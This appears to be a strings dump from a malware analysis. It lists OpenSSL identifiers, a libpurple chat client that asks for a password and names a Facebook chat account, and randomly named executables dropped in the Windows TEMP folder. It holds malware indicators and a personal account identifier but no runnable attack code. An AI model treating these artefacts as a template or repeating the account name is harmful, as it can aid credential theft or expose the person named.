X509v3 Key Usage
privateKeyUsagePeriod
privateKeyUsagePeriod
X509v3 Private Key Usage Period
X509v3 Private Key Usage Period
certificatePolicies
certificatePolicies
X509v3 Certificate Policies
X509v3 Certificate Policies
authorityKeyIdentifier
authorityKeyIdentifier
X509v3 Authority Key Identifier
X509v3 Authority Key Identifier
extendedKeyUsage
extendedKeyUsage
X509v3 Extended Key Usage
X509v3 Extended Key Usage
TLS Web Server Authentication
TLS Web Server Authentication
TLS Web Client Authentication
TLS Web Client Authentication
pbeWithSHA1And3-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And2-KeyTripleDES-CBC
keyBag
keyBag
pkcs8ShroudedKeyBag
pkcs8ShroudedKeyBag
certBag
certBag
localKeyID
localKeyID
x509Certificate
x509Certificate
sdsiCertificate
sdsiCertificate
id-smime-mod-msg-v3
id-smime-mod-msg-v3
id-smime-ct-publishCert
id-smime-ct-publishCert
id-smime-aa-msgSigDigest
id-smime-aa-msgSigDigest
id-smime-aa-encrypKeyPref
id-smime-aa-encrypKeyPref
id-smime-aa-signingCertificate
id-smime-aa-signingCertificate
id-smime-aa-smimeEncryptCerts
id-smime-aa-smimeEncryptCerts
id-smime-aa-ets-otherSigCert
id-smime-aa-ets-otherSigCert
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-certValues
id-smime-aa-ets-certValues
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certCRLTimestamp
id-mod-qualified-cert-88
id-mod-qualified-cert-88
id-mod-qualified-cert-93
id-mod-qualified-cert-93
id-mod-attribute-cert
id-mod-attribute-cert
id-it-caProtEncCert
id-it-caProtEncCert
id-it-signKeyPairTypes
id-it-signKeyPairTypes
id-it-encKeyPairTypes
id-it-encKeyPairTypes
id-it-caKeyUpdateInfo
id-it-caKeyUpdateInfo
id-it-unsupportedOIDs
id-it-unsupportedOIDs
id-it-keyPairParamReq
id-it-keyPairParamReq
id-it-keyPairParamRep
id-it-keyPairParamRep
id-it-revPassphrase
id-it-revPassphrase
id-regCtrl-oldCertID
id-regCtrl-oldCertID
id-regCtrl-protocolEncrKey
id-regCtrl-protocolEncrKey
id-regInfo-certReq
id-regInfo-certReq
id-cmc-getCert
id-cmc-getCert
id-cmc-confirmCertAcceptance
id-cmc-confirmCertAcceptance
id-ecPublicKey
id-ecPublicKey
set-msgExt
set-msgExt
set-certExt
set-certExt
certificate extensions
certificate extensions
setct-AcqCardCodeMsg
setct-AcqCardCodeMsg
setct-PCertReqData
setct-PCertReqData
setct-PCertResTBS
setct-PCertResTBS
setct-CertReqData
setct-CertReqData
setct-CertReqTBS
setct-CertReqTBS
setct-CertResData
setct-CertResData
setct-CertInqReqTBS
setct-CertInqReqTBS
setct-AcqCardCodeMsgTBE
setct-AcqCardCodeMsgTBE
setct-CertReqTBE
setct-CertReqTBE
setct-CertReqTBEX
setct-CertReqTBEX
setct-CertResTBE
setct-CertResTBE
setCext-certType
setCext-certType
setCext-cCertRequired
setCext-cCertRequired
setAttr-Cert
setAttr-Cert
set-rootKeyThumb
set-rootKeyThumb
JOINT-ISO-ITU-T
JOINT-ISO-ITU-T
joint-iso-itu-t
joint-iso-itu-t
msSmartcardLogin
msSmartcardLogin
Microsoft Smartcardlogin
Microsoft Smartcardlogin
proxyCertInfo
proxyCertInfo
Proxy Certificate Information
Proxy Certificate Information
certicom-arc
certicom-arc
certificateIssuer
certificateIssuer
X509v3 Certificate Issuer
X509v3 Certificate Issuer
id-PasswordBasedMAC
id-PasswordBasedMAC
password based MAC
password based MAC
id-Gost28147-89-CryptoPro-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-None-KeyMeshing
LocalKeySet
LocalKeySet
Microsoft Local Key set
Microsoft Local Key set
supportedApplicationContext
supportedApplicationContext
userPassword
userPassword
userCertificate
userCertificate
cACertificate
cACertificate
certificateRevocationList
certificateRevocationList
crossCertificatePair
crossCertificatePair
supportedAlgorithms
supportedAlgorithms
anyExtendedKeyUsage
anyExtendedKeyUsage
Any Extended Key Usage
Any Extended Key Usage
lhash part of OpenSSL 1.0.1e 11 Feb 2013
lhash part of OpenSSL 1.0.1e 11 Feb 2013
[d:d:d]
[d:d:d]
%5lu file=%s, line=%d,
%5lu file=%s, line=%d,
number=%d, address=lX
number=%d, address=lX
thread=%lu, file=%s, line=%d, info="
thread=%lu, file=%s, line=%d, info="
%ld bytes leaked in %d chunks
%ld bytes leaked in %d chunks
Big Number part of OpenSSL 1.0.1e 11 Feb 2013
Big Number part of OpenSSL 1.0.1e 11 Feb 2013
bn(%d,%d)
bn(%d,%d)
ASN.1 part of OpenSSL 1.0.1e 11 Feb 2013
ASN.1 part of OpenSSL 1.0.1e 11 Feb 2013
OPENSSL_Uplink(%p,X):
OPENSSL_Uplink(%p,X):
_matherr(): %s in %s(%g, %g) (retval=%g)
_matherr(): %s in %s(%g, %g) (retval=%g)
VirtualQuery failed for %d bytes at address %p
VirtualQuery failed for %d bytes at address %p
VirtualProtect failed with code 0x%x
VirtualProtect failed with code 0x%x
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
Unknown pseudo relocation bit size %d.
unknown option -- %s
unknown option -- %s
unknown option -- %c
unknown option -- %c
option requires an argument -- %s
option requires an argument -- %s
option requires an argument -- %c
option requires an argument -- %c
GCC: (GNU) 4.8.2 20131016 (Fedora MinGW 4.8.2-1.fc20)
GCC: (GNU) 4.8.2 20131016 (Fedora MinGW 4.8.2-1.fc20)
439377800910733
439377800910733
ReportEventA
ReportEventA
PeekNamedPipe
PeekNamedPipe
_acmdln
_acmdln
_amsg_exit
_amsg_exit
GetProcessWindowStation
GetProcessWindowStation
ldap_msgfree
ldap_msgfree
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
msvcrt.dll
msvcrt.dll
USER32.dll
USER32.dll
wldap32.dll
wldap32.dll
WS2_32.dll
WS2_32.dll
"@"@"@"@
"@"@"@"@
File: %ws, Line %u
File: %ws, Line %u
purple.exe_2604:
.text
.text
P`.data
P`.data
.rdata
.rdata
0@.bss
0@.bss
.idata
.idata
libgcc_s_dw2-1.dll
libgcc_s_dw2-1.dll
libgcj-13.dll
libgcj-13.dll
User "%s" (%s) has sent a buddy request
User "%s" (%s) has sent a buddy request
Connection disconnected: "%s" (%s)
Connection disconnected: "%s" (%s)
>Error: %d
>Error: %d
PURPLE_DISCONNECT_REASON %s
PURPLE_DISCONNECT_REASON %s
(%H:%M:%S)
(%H:%M:%S)
(%s) %s %s: %s
(%s) %s %s: %s
buddy %s is now %s
buddy %s is now %s
Account connected: %s %s
Account connected: %s %s
@chat.facebook.com
@chat.facebook.com
PURPLE_GOT_BUDDY %s
PURPLE_GOT_BUDDY %s
Please report this!
Please report this!
%d,%s
%d,%s
Select the protocol: [0-%d]:
Select the protocol: [0-%d]:
Enter the password:
Enter the password:
Failed to read password.
Failed to read password.
VirtualQuery failed for %d bytes at address %p
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
Unknown pseudo relocation bit size %d.
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
sebastianconstantinbaciu@chat.facebook.com
sebastianconstantinbaciu@chat.facebook.com
purple_account_set_password
purple_account_set_password
libglib-2.0-0.dll
libglib-2.0-0.dll
libgthread-2.0-0.dll
libgthread-2.0-0.dll
libpurple.dll
libpurple.dll
kernel32.dll
kernel32.dll
msvcrt.dll
msvcrt.dll
glhljywourzj.exe_2816:
.text
.text
`.rdata
`.rdata
@.data
@.data
QSSSSSSh
QSSSSSSh
SQSSSh
SQSSSh
YrR.Vf
YrR.Vf
-.pX>
-.pX>
SSSh0
SSSh0
SPSSSh
SPSSSh
SSShp/C
SSShp/C
tFSSSh
tFSSSh
t)SSShP
t)SSShP
SSShP
SSShP
SSShp
SSShp
SSShp&C
SSShp&C
t\SSSh
t\SSSh
vSSSh
vSSSh
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
tGHt.Ht&
tGHt.Ht&
WS2_32.dll
WS2_32.dll
OLEAUT32.dll
OLEAUT32.dll
cmd.exe
cmd.exe
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
portuguese-brazilian
portuguese-brazilian
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
GDI32.dll
GDI32.dll
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
unovkkdak.exe
unovkkdak.exe
zj.exe
zj.exe
eityzygishyx.exe
eityzygishyx.exe
o8.OLnzG
o8.OLnzG
.LlqI
.LlqI
Y:\Bp
Y:\Bp
%s _\(
%s _\(
?_.eg]
?_.eg]
Ì>$
Ì>$
By.Ix
By.Ix
j.mSd
j.mSd
%u 0a
%u 0a
zcÁ
zcÁ
%Documents and Settings%\LocalService
%Documents and Settings%\LocalService
%WinDir%\TEMP\glhljywourzj.exe
%WinDir%\TEMP\glhljywourzj.exe
mscoree.dll
mscoree.dll
KERNEL32.DLL
KERNEL32.DLL